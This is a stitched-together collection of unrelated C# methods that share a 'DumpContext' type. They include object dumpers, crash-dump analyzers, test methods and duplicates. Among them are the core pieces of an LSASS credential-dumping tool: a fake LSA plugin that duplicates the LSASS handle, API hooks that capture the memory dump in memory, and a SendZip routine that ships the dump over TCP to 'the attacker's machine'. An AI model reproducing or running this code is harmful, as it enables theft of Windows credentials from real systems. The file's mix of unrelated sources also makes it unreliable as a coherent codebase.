internal override void Dump(DumpContext dumpContext)
{
base.Dump(dumpContext);
dumpContext.Indent();
_sequenceManager.Dump(dumpContext);
dumpContext.Unindent();
}
static uint SetFilePointer(IntPtr fileHandle, int distanceToMove, ref int distanceToMoveHigh, MoveMethod moveMethod)
{
DumpContext dc = GetDumpContextFromHandle(fileHandle);
if (dc == null)
{
return(SetFilePointer_orig(fileHandle, distanceToMove, ref distanceToMoveHigh, moveMethod));
}
switch (moveMethod)
{
case MoveMethod.Begin:
dc.CurrentOffset = (uint)distanceToMove;
break;
case MoveMethod.Current:
dc.CurrentOffset = (uint)(dc.CurrentOffset + distanceToMove);
break;
case MoveMethod.End:
dc.CurrentOffset = (uint)(dc.Size + distanceToMove);
break;
default:
return(0xffffffff);
}
return(dc.CurrentOffset);
}
internal void Dump(DumpContext dumpContext)
{
dumpContext.AppendLine("Sequence Id = " + _id.ToString() + " Count = " + this.Count.ToString() + " Subscribers = " + this.SubscriberCount.ToString());
dumpContext.Indent();
int count = Math.Min(this.Count, 20);
StringBuilder sb = new StringBuilder();
sb.Append("[ ");
for (int i = 0; i < count; i++)
{
if (i > 0)
{
sb.Append(", ");
}
Identity identity = this[i];
sb.Append("[");
foreach (DictionaryEntry entry in identity)
{
sb.Append(identity[entry.Key].ToString());
}
sb.Append("]");
}
sb.Append(" ]");
dumpContext.AppendLine(sb.ToString());
dumpContext.Unindent();
}
static bool WriteFile(IntPtr fileHandle, IntPtr buffer, uint numberOfBytesToWrite, out uint numberOfBytesWritten, IntPtr overlapped)
{
DumpContext dc = GetDumpContextFromHandle(fileHandle);
if (dc == null)
{
return(WriteFile_orig(fileHandle, buffer, numberOfBytesToWrite, out numberOfBytesWritten, overlapped));
}
if (dc.Limit != 0 && dc.CurrentOffset + numberOfBytesToWrite > dc.Limit)
{
SetLastError(ERROR_DISK_FULL);
numberOfBytesWritten = 0;
return(false);
}
else if (dc.CurrentOffset + numberOfBytesToWrite > dc.Data.Length)
{
Console.Write(".");
dc.Resize(dc.CurrentOffset + numberOfBytesToWrite);
}
Marshal.Copy(buffer, dc.Data, (int)dc.CurrentOffset, (int)numberOfBytesToWrite);
dc.CurrentOffset += numberOfBytesToWrite;
numberOfBytesWritten = numberOfBytesToWrite;
int growth = (int)dc.CurrentOffset - (int)dc.Size;
if (growth > 0)
{
dc.Size += (uint)growth;
}
return(true);
}
internal void Dump(DumpContext dumpContext)
{
dumpContext.AppendLine("Sequence Id = " + this._id.ToString() + " Count = " + base.Count.ToString() + " Subscribers = " + this.SubscriberCount.ToString());
dumpContext.Indent();
int num = Math.Min(base.Count, 20);
StringBuilder builder = new StringBuilder();
builder.Append("[ ");
for (int i = 0; i < num; i++)
{
if (i > 0)
{
builder.Append(", ");
}
Identity identity = this[i];
builder.Append("[");
foreach (DictionaryEntry entry in identity)
{
builder.Append(identity[entry.Key].ToString());
}
builder.Append("]");
}
builder.Append(" ]");
dumpContext.AppendLine(builder.ToString());
dumpContext.Unindent();
}
private static void DumpEnumerable(IEnumerable enumerable, DumpContext ctx)
{
Int32 nCount = 0;
Boolean isSimpleType = true;
Boolean isKeyValuePairs = false;
PropertyInfo keyProp = null;
PropertyInfo valueProp = null;
var type = (from object value in enumerable
where value != null
select value.GetType()).FirstOrDefault();
if (type != null)
{
if (type.IsGenericType && type.GetGenericTypeDefinition() == typeof(KeyValuePair <,>))
{
keyProp = type.GetProperty("Key");
valueProp = type.GetProperty("Value");
isKeyValuePairs = true;
}
isSimpleType = Type.GetTypeCode(type) != TypeCode.Object;
}
foreach (Object value in enumerable)
{
if (!isSimpleType)
{
ctx.NewLine();
}
else if (nCount > 0)
{
ctx.Builder.Append(ctx.Settings.EnumerableDelimiter);
}
if (nCount >= ctx.Settings.MaxEnumerableItems)
{
ctx.Builder.Append("... (first ").Append(nCount.ToString()).Append(" items");
var collection = enumerable as ICollection;
if (collection != null)
{
ctx.Builder.Append(", ").Append(collection.Count.ToString()).Append(" items total");
}
ctx.Builder.Append(")");
break;
}
if (!isKeyValuePairs)
{
DumpObject(value, true, ctx);
}
else
{
ctx.Builder.Append(ToStringSafe(keyProp.GetValue(value, null)));
ctx.Builder.Append(": ");
DumpObject(valueProp.GetValue(value, null), false, ctx);
}
nCount++;
}
if (nCount == 0)
{
ctx.Builder.Append("<EMPTY>");
}
}
public void Cleanup()
{
if (context != null)
{
context.Dispose();
context = null;
}
}
private static void DumpProps(object obj, Type type, DumpContext ctx)
{
var propValues = new Dictionary <String, Object>();
PropertyInfo[] props = type.GetProperties(BindingFlags.Instance | BindingFlags.Public);
foreach (var prop in props)
{
if (!prop.CanRead || prop.GetIndexParameters().Length != 0)
{
continue;
}
if (ctx.Settings.PropsToIgnore.Contains(prop.Name))
{
continue;
}
try
{
propValues[prop.Name] = prop.GetValue(obj, null);
}
catch (TargetInvocationException ex)
{
propValues[prop.Name] = String.Format("Ошибка при получении свойства {0} объекта типа {1} : {2}",
prop.Name,
type.FullName,
ex.InnerException != null ? ex.InnerException.Message : ex.Message
);
}
}
FieldInfo[] fields = type.GetFields(BindingFlags.Instance | BindingFlags.Public);
foreach (var field in fields)
{
if (ctx.Settings.PropsToIgnore.Contains(field.Name))
{
continue;
}
try
{
propValues[field.Name] = field.GetValue(obj);
}
catch (FieldAccessException ex)
{
propValues[field.Name] = ex.Message;
}
}
if (propValues.Count == 0 || propValues.Count > ctx.Settings.MaxProps)
{
WriteObject(obj, type, ctx);
}
else
{
foreach (KeyValuePair <String, Object> pair in propValues)
{
ctx.NewLine();
ctx.Builder.Append(pair.Key).Append(": ");
DumpObject(pair.Value, false, ctx);
}
}
}
public ExceptionAnalyzer(DumpContext context, SDResult res)
{
this.context = context;
this.res = res;
using (DataTarget t = this.context.CreateTemporaryDbgEngTarget()) {
this.debugClient = t.DebuggerInterface;
this.InitLastEvent();
}
}
public SystemAnalyzer(DumpContext context)
{
this.context = context;
this.systemInfo = new SDSystemContext();
using (DataTarget t = this.context.CreateTemporaryDbgEngTarget()) {
this.debugClient = t.DebuggerInterface;
this.InitSystemInfo();
}
}
public static void DumpObject(Object obj, TextBuilder builder, ObjectDumperSettings settings)
{
var ctx = new DumpContext
{
Builder = builder,
Settings = settings ?? ObjectDumperSettings.Default,
RootType = (!settings.DoNotUseToStringMethod || obj == null) ? null : obj.GetType()
};
DumpObject(obj, /*bNeedTypeName*/false, ctx);
}
public MemoryAnalyzer(DumpContext context)
{
this.context = context;
this.memDict = new Dictionary <ulong, SDMemoryObject>();
this.blockingObjects = new List <SDBlockingObject>();
this.GetBlockingObjects();
this.InitMemoryStat();
this.PrintMemoryStat();
}
public static void DumpObject(Object obj, TextBuilder builder, ObjectDumperSettings settings)
{
var ctx = new DumpContext
{
Builder = builder,
Settings = settings ?? ObjectDumperSettings.Default,
RootType = (!settings.DoNotUseToStringMethod || obj == null) ? null : obj.GetType()
};
DumpObject(obj, /*bNeedTypeName*/ false, ctx);
}
static uint GetFileSize(IntPtr fileHandle, out uint fileSizeHigh)
{
DumpContext dc = GetDumpContextFromHandle(fileHandle);
if (dc == null)
{
return(GetFileSize_orig(fileHandle, out fileSizeHigh));
}
fileSizeHigh = 0;
return(dc.Size);
}
static void SaveZip(string fileName, DumpContext dc)
{
using (var fileStream = new FileStream(fileName, FileMode.Create, FileAccess.ReadWrite)) {
using (var archive = new ZipArchive(fileStream, ZipArchiveMode.Create, true)) {
var lsassDump = archive.CreateEntry($"{Guid.NewGuid()}.dmp");
using (var entryStream = lsassDump.Open()) {
using (var streamWriter = new BinaryWriter(entryStream)) {
streamWriter.Write(dc.Data, 0, (int)dc.Size);
}
}
}
}
}
public void Can_extract_gc_roots()
{
using var dumpContext = new DumpContext(_store);
dumpContext.LoadFromDump("allocations.dmp");
dumpContext.ExtractDataWith(new GcRootsExtractor(), new HeapObjectsExtractor());
using var session = _store.OpenSession();
var gcRootCount = session.Query <GcRoot>().Count();
//sanity check...
Assert.Equal(60, gcRootCount);
}
internal void Dump(DumpContext dumpContext)
{
dumpContext.AppendLine("SequenceManager, Items count = " + this._itemIdToItemHash.Count.ToString() + ", Subscribers = " + this._clientIdToSequenceHash.Count.ToString());
Sequence[] sequences = this.GetSequences();
if (sequences.Length > 0)
{
dumpContext.AppendLine("Sequences");
foreach (Sequence sequence in sequences)
{
dumpContext.Indent();
sequence.Dump(dumpContext);
dumpContext.Unindent();
}
}
}
private static void DumpEnumerable(IEnumerable enumerable, DumpContext ctx)
{
Int32 nCount = 0;
Boolean isSimpleType = true;
Boolean isKeyValuePairs = false;
PropertyInfo keyProp = null;
PropertyInfo valueProp = null;
var type = (from object value in enumerable
where value != null
select value.GetType()).FirstOrDefault();
if (type != null)
{
if (type.IsGenericType && type.GetGenericTypeDefinition() == typeof (KeyValuePair<,>))
{
keyProp = type.GetProperty("Key");
valueProp = type.GetProperty("Value");
isKeyValuePairs = true;
}
isSimpleType = Type.GetTypeCode(type) != TypeCode.Object;
}
foreach (Object value in enumerable)
{
if (!isSimpleType)
ctx.NewLine();
else if (nCount > 0)
ctx.Builder.Append(ctx.Settings.EnumerableDelimiter);
if (nCount >= ctx.Settings.MaxEnumerableItems)
{
ctx.Builder.Append("... (first ").Append(nCount.ToString()).Append(" items");
var collection = enumerable as ICollection;
if (collection != null)
ctx.Builder.Append(", ").Append(collection.Count.ToString()).Append(" items total");
ctx.Builder.Append(")");
break;
}
if (!isKeyValuePairs)
DumpObject(value, true, ctx);
else
{
ctx.Builder.Append(ToStringSafe(keyProp.GetValue(value, null)));
ctx.Builder.Append(": ");
DumpObject(valueProp.GetValue(value, null), false, ctx);
}
nCount++;
}
if (nCount == 0)
ctx.Builder.Append("<EMPTY>");
}
public void Can_load_dump()
{
using var dumpContext = new DumpContext(_store);
dumpContext.LoadFromDump("allocations.dmp");
dumpContext.ExtractDataWith(new HeapObjectsExtractor(), new StringsExtractor());
using var session = _store.OpenSession();
var objectCount = session.Query <Core.Object>().Count();
var stringCount = session.Query <Core.String>().Count();
//sanity check...
Assert.Equal(146, objectCount);
Assert.Equal(34, stringCount);
}
public ThreadAnalyzer(DumpContext context)
{
this.context = context;
this.exceptions = new List <SDClrException>();
this.threads = new Dictionary <uint, SDThread>();
this.deadlocks = new List <SDDeadlockContext>();
using (DataTarget target = this.context.CreateTemporaryDbgEngTarget()) {
this.debugClient = target.DebuggerInterface;
// init threads
this.InitAllThreadIds();
this.InitBasicThreadInformation();
this.GetCombinedStackTraces();
this.GetManagedExceptions();
this.GetBlockingObjects();
this.DetectDeadlock();
}
}
internal static void InitHookEngine(IntPtr contextHandle, uint dumpSizeLimit, int lsassPid, IntPtr lsassHandle)
{
hookEngine = new HookEngine();
dumpContexts[contextHandle] = new DumpContext(dumpSizeLimit);
MiniDumpToMem.lsassPid = lsassPid;
MiniDumpToMem.lsassHandle = lsassHandle;
SetFilePointer_detour = new SetFilePointerDelegate(SetFilePointer);
GetFileSize_detour = new GetFileSizeDelegate(GetFileSize);
WriteFile_detour = new WriteFileDelegate(WriteFile);
NtOpenProcess_detour = new NtOpenProcessDelegate(NtOpenProcess);
NtOpenProcess_orig = hookEngine.CreateHook("ntdll.dll", "NtOpenProcess", NtOpenProcess_detour);
SetFilePointer_orig = hookEngine.CreateHook("kernelbase.dll", "SetFilePointer", SetFilePointer_detour);
GetFileSize_orig = hookEngine.CreateHook("kernelbase.dll", "GetFileSize", GetFileSize_detour);
WriteFile_orig = hookEngine.CreateHook("kernelbase.dll", "WriteFile", WriteFile_detour);
hookEngine.EnableHooks();
}
public void Initialize()
{
if (context == null)
{
context = new DumpContext();
string dump = Environment.CurrentDirectory + @"\..\..\..\SuperDump\dumps\dotnetworld2\dotnetworld2.dmp";
Assert.IsTrue(File.Exists(dump));
string dac = null;
DataTarget target = DataTarget.LoadCrashDump(dump, CrashDumpReader.ClrMD);
target.SymbolLocator.SymbolPath = SYMBOL_PATH;
context.Target = target;
context.Runtime = target.CreateRuntime(ref dac);
context.Heap = context.Runtime.Heap;
context.DumpFile = dump;
context.DumpDirectory = Path.GetDirectoryName(context.DumpFile);
context.Printer = new ConsolePrinter();
context.SymbolLocator = target.SymbolLocator;
context.SymbolPath = target.SymbolLocator.SymbolPath;
}
}
public static void Main()
{
var logRepository = LogManager.GetRepository(Assembly.GetEntryAssembly());
XmlConfigurator.Configure(logRepository, new FileInfo("log4net.config"));
var logger = logRepository.GetLogger("FooBar");
EmbeddedServer.Instance.StartServer(new ServerOptions
{
AcceptEula = true,
CommandLineArgs = new List <string> {
"Setup.Mode=None", "RunInMemory=true"
},
FrameworkVersion = Environment.Version.ToString()
});
var store = EmbeddedServer.Instance.GetDocumentStore(new DatabaseOptions("Metadata")
{
Conventions = new DocumentConventions
{
CustomizeJsonSerializer = serializer =>
{
serializer.ReferenceLoopHandling = ReferenceLoopHandling.Ignore;
serializer.NullValueHandling = NullValueHandling.Ignore;
serializer.ContractResolver = new DumpExplorerContractSerializer();
},
RequestTimeout = TimeSpan.FromMinutes(5)
}
});
using var dumpContext = new DumpContext(store);
dumpContext.OperationEvent += DumpContext_OperationEvent;
dumpContext.LoadFromDump("allocations.dmp");
EmbeddedServer.Instance.OpenStudioInBrowser();
dumpContext.ExtractDataWith(new HeapObjectsExtractor(), new ExceptionExtractor(), new StringsExtractor(), new GcRootsExtractor());
Console.ReadKey();
}
static void SendZip(string host, int port, DumpContext dc)
{
using (var outStream = new MemoryStream())
{
using (var archive = new ZipArchive(outStream, ZipArchiveMode.Create, true))
{
var lsassDump = archive.CreateEntry($"{Guid.NewGuid()}.bin");
using (var entryStream = lsassDump.Open())
{
using (var dumpCompressStream = new MemoryStream(dc.Data))
{
dumpCompressStream.CopyTo(entryStream);
}
}
}
byte[] compressedBytes = outStream.ToArray();
Console.WriteLine($"[+] Minidump successfully packed in memory, size {Math.Round(compressedBytes.Length / 1024.0 / 1024.0, 2)} MB");
byte[] zipHashBytes = MD5.Create().ComputeHash(compressedBytes);
string zipHash = BitConverter.ToString(zipHashBytes).Replace("-", "");
Console.WriteLine($"[*] MD5: {zipHash}");
using (var tcpClient = new TcpClient(host, port))
{
using (var netStream = tcpClient.GetStream())
{
string hostName = System.Environment.GetEnvironmentVariable("COMPUTERNAME");
string zipSize = (compressedBytes.Length).ToString();
byte[] stage = Encoding.ASCII.GetBytes($"{hostName}|{zipSize}");
netStream.Write(stage, 0, stage.Length);
netStream.Write(compressedBytes, 0, compressedBytes.Length);
}
}
}
}
private static void WriteObject(Object obj, Type type, DumpContext ctx)
{
if (!ctx.CanUseToStringForType(type))
{
ctx.Builder.Append(type.FullName);
return;
}
String text = ToStringSafe(obj);
String[] lines = text.Split(new[] { Environment.NewLine }, StringSplitOptions.None);
if (lines.Length <= 1)
{
ctx.Builder.Append(text);
}
else
{
ctx.Builder.IncreaseIndent();
foreach (String line in lines)
{
ctx.Builder.EmptyLine().BeginLine(line);
}
ctx.Builder.DecreaseIndent();
}
}
private static void DumpObject(Object obj, Boolean bNeedTypeName, DumpContext ctx)
{
if (obj == null)
{
ctx.Builder.Append("<NULL>");
return;
}
Type type = obj.GetType();
TypeCode typeCode = Type.GetTypeCode(type);
if (typeCode == TypeCode.String)
{
WriteObject(obj, type, ctx);
return;
}
if (typeCode != TypeCode.Object)
{
ctx.Builder.Append(ToStringSafe(obj));
return;
}
if (ctx.Depth > ctx.Settings.MaxDepth)
{
WriteObject(obj, type, ctx);
return;
}
if (ctx.CanUseToStringForType(type))
{
var toStringMethod = type.GetMethod(
"ToString",
BindingFlags.Public | BindingFlags.Instance | BindingFlags.DeclaredOnly,
null,
Type.EmptyTypes,
null);
if (toStringMethod != null)
{
WriteObject(obj, type, ctx);
return;
}
}
if (typeof (Stream).IsAssignableFrom(type))
{
WriteObject(obj, type, ctx);
return;
}
if (bNeedTypeName)
ctx.Builder.Append("{").Append(type.Name).Append("}: ");
if (ctx.Depth > 0)
ctx.Builder.IncreaseIndent();
ctx.Depth++;
IEnumerable enumerable;
if ((enumerable = obj as IEnumerable) != null)
DumpEnumerable(enumerable, ctx);
else
DumpProps(obj, type, ctx);
ctx.Depth--;
if (ctx.Depth > 0)
ctx.Builder.DecreaseIndent();
}
static void Main(string[] args)
{
uint limit = 0;
string fileName = "lsass.zip";
string dllName = "LsaProviderDuper.dll";
string host = "";
int port = 0;
bool parse = false;
bool showHelp = false;
OptionSet option_set = new OptionSet()
.Add("f=|filename=", "Output path for generated zip file", v => fileName = v)
.Add("d=|dllName", "Output LSA DLL name", v => dllName = v)
.Add("l=|limit=", "The maximum amount of memory the minidump is allowed to consume", v => limit = uint.Parse(v))
.Add("host=", "IP or a hostname of the attacker's machine (if specified the dump will be sent to attacker over TCP)", v => host = v)
.Add("port=", "Port number for the minidump to be sent to (must be used with --host option)", v => port = int.Parse(v))
.Add("p|parse", "Parse the minidump online without touching the disk (uses https://github.com/cube0x0/MiniDump)", v => parse = v != null)
.Add("h|help", "Display this help", v => showHelp = v != null);
try {
option_set.Parse(args);
if (fileName == null)
{
showHelp = true;
}
if (showHelp)
{
option_set.WriteOptionDescriptions(Console.Out);
return;
}
} catch (Exception e) {
Console.WriteLine("[!] Failed to parse arguments: {0}", e.Message);
option_set.WriteOptionDescriptions(Console.Out);
return;
}
//Generate our LSA plugin DLL that will duplicate lsass handle into this process
Console.Write($"[+] Generating new LSA DLL {dllName} targeting PID {Process.GetCurrentProcess().Id}.....");
LsaAssembly.GenerateLsaPlugin(dllName);
Console.WriteLine($"Done.");
//Load our LSA plugin. This will actually return a failiure due to us
//not implementing a correct LSA plugin, but it's enough to duplicate the handle
SECURITY_PACKAGE_OPTIONS spo = new SECURITY_PACKAGE_OPTIONS();
AddSecurityPackage(new FileInfo(dllName).FullName, spo);
Console.WriteLine("[+] LSA security package loaded, searching current process for duplicated LSASS handle");
//Now search this process for the duplicated handle that the LSA plugin done on our behalf
var procHandle = FindLsassHandle();
if (procHandle != null)
{
Console.WriteLine($"[+] Found duplicated LSASS process handle 0x{procHandle.Handle.ToInt64():x}");
}
else
{
Console.WriteLine($"[!] Failed to get LSASS handle, bailing!");
return;
}
//http://cybernigma.blogspot.com/2014/03/using-sspap-lsass-proxy-to-mitigate.html
//It actually has no effect what so ever, so only a reboot will get rid of the DLL from LSASS
DeleteSecurityPackage(new FileInfo(dllName).FullName);
//OK, first part done. We have our LSASS handle. Now lets perform our dump in memory
//by hook the relevant file writing API's and redirect to memory
MiniDumpToMem.InitHookEngine(MagicHandle, limit, procHandle.Process.Id, procHandle.Handle);
Console.Write("[=] Dumping LSASS memory");
if (!MiniDumpWriteDump(procHandle.Handle, (uint)procHandle.Process.Id, MagicHandle, MINIDUMP_TYPE.MiniDumpWithFullMemory, IntPtr.Zero, IntPtr.Zero, IntPtr.Zero))
{
if (Marshal.GetLastWin32Error() == ERROR_DISK_FULL)
{
Console.WriteLine("\n[!] Minidump memory limit reached, could not create dump");
}
else
{
Console.WriteLine($"\n[!] Minidump generation failed with error 0x{Marshal.GetHRForLastWin32Error():x}");
}
}
else
{
Console.WriteLine($"\n[+] Minidump successfully saved to memory, size {Math.Round(MiniDumpToMem.GetDumpContextFromHandle(MagicHandle).Size / 1024.0 / 1024.0, 2)}MB");
}
//All done, lets clean up and zip our dump for demo purposes
CloseHandle(procHandle.Handle);
MiniDumpToMem.ShutdownHookEngine();
//Get the dump contents
DumpContext dc = MiniDumpToMem.GetDumpContextFromHandle(MagicHandle);
//Now we can parse the dump live (may not work on some systems)
if (parse)
{
Console.WriteLine("[*] Parsing minidump...");
Minidump.Program.Main(dc.Data);
}
//Save the zip locally
else if (port == -1)
{
SaveZip(fileName, dc);
Console.WriteLine($"[+] Minidump saved to {fileName}");
}
//Or send it over TCP
else
{
try
{
SendZip(host, port, dc);
Console.WriteLine($"[+] Minidump sent to {host}:{port}");
}
catch (Exception ex)
{
Console.WriteLine($"[-] Error sending data: {ex.Message}");
Console.WriteLine(ex.StackTrace);
}
}
}
private static void DumpProps(object obj, Type type, DumpContext ctx)
{
var propValues = new Dictionary<String, Object>();
PropertyInfo[] props = type.GetProperties(BindingFlags.Instance | BindingFlags.Public);
foreach (var prop in props)
{
if (!prop.CanRead || prop.GetIndexParameters().Length != 0)
continue;
if (ctx.Settings.PropsToIgnore.Contains(prop.Name))
continue;
try
{
propValues[prop.Name] = prop.GetValue(obj, null);
}
catch (TargetInvocationException ex)
{
propValues[prop.Name] = String.Format("Ошибка при получении свойства {0} объекта типа {1} : {2}",
prop.Name,
type.FullName,
ex.InnerException != null ? ex.InnerException.Message : ex.Message
);
}
}
FieldInfo[] fields = type.GetFields(BindingFlags.Instance | BindingFlags.Public);
foreach (var field in fields)
{
if (ctx.Settings.PropsToIgnore.Contains(field.Name))
continue;
try
{
propValues[field.Name] = field.GetValue(obj);
}
catch (FieldAccessException ex)
{
propValues[field.Name] = ex.Message;
}
}
if (propValues.Count == 0 || propValues.Count > ctx.Settings.MaxProps)
WriteObject(obj, type, ctx);
else
{
foreach (KeyValuePair<String, Object> pair in propValues)
{
ctx.NewLine();
ctx.Builder.Append(pair.Key).Append(": ");
DumpObject(pair.Value, false, ctx);
}
}
}
private static void DumpObject(Object obj, Boolean bNeedTypeName, DumpContext ctx)
{
if (obj == null)
{
ctx.Builder.Append("<NULL>");
return;
}
Type type = obj.GetType();
TypeCode typeCode = Type.GetTypeCode(type);
if (typeCode == TypeCode.String)
{
WriteObject(obj, type, ctx);
return;
}
if (typeCode != TypeCode.Object)
{
ctx.Builder.Append(ToStringSafe(obj));
return;
}
if (ctx.Depth > ctx.Settings.MaxDepth)
{
WriteObject(obj, type, ctx);
return;
}
if (ctx.CanUseToStringForType(type))
{
var toStringMethod = type.GetMethod(
"ToString",
BindingFlags.Public | BindingFlags.Instance | BindingFlags.DeclaredOnly,
null,
Type.EmptyTypes,
null);
if (toStringMethod != null)
{
WriteObject(obj, type, ctx);
return;
}
}
if (typeof(Stream).IsAssignableFrom(type))
{
WriteObject(obj, type, ctx);
return;
}
if (bNeedTypeName)
{
ctx.Builder.Append("{").Append(type.Name).Append("}: ");
}
if (ctx.Depth > 0)
{
ctx.Builder.IncreaseIndent();
}
ctx.Depth++;
IEnumerable enumerable;
if ((enumerable = obj as IEnumerable) != null)
{
DumpEnumerable(enumerable, ctx);
}
else
{
DumpProps(obj, type, ctx);
}
ctx.Depth--;
if (ctx.Depth > 0)
{
ctx.Builder.DecreaseIndent();
}
}
private static void WriteObject(Object obj, Type type, DumpContext ctx)
{
if (!ctx.CanUseToStringForType(type))
{
ctx.Builder.Append(type.FullName);
return;
}
String text = ToStringSafe(obj);
String[] lines = text.Split(new[] {Environment.NewLine}, StringSplitOptions.None);
if (lines.Length <= 1)
ctx.Builder.Append(text);
else
{
ctx.Builder.IncreaseIndent();
foreach (String line in lines)
{
ctx.Builder.EmptyLine().BeginLine(line);
}
ctx.Builder.DecreaseIndent();
}
}
public WinDbgAnalyzer(DumpContext context, string logfilepath)
{
this.context = context;
this.logfilepath = logfilepath;
}
internal virtual void Dump(DumpContext dumpContext)
{
dumpContext.AppendLine("Destination Id = " + this.Id);
}
